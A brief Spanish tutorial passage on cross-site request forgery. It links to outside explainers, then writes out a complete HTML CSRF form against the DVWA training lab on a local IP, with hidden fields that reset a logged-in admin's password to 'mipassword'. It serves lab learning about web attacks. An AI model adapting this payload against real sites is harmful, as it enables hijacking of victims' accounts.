Una buena explicación y seguridad para estos ataques en :
welivesecurity
Donde se explica de forma sencilla el procedimiento y como protegerse. Y en esta igual:
evidaliahost
Otros enlaces:
Wikipedia
En DVWA podemos crear un formulario y si el administrador "admin", pulsa en el, cambiará su password si está logeado o con sesión abierta y el nivel está en low. Así quedaría el form:
<form action="http://192.168.1.132/DVWA-1.9/vulnerabilities/csrf/index.php" method="GET">
New password:<br />
<input type="hidden" AUTOCOMPLETE="off" name="password_new" value="mipassword"><br />
Confirm new password:<br />
<input type="hidden" AUTOCOMPLETE="off" name="password_conf" value="mipassword"><br />
<br />
<input type="submit" value="Change" name="Change">
</form>
Cambiando el password a mipassword :)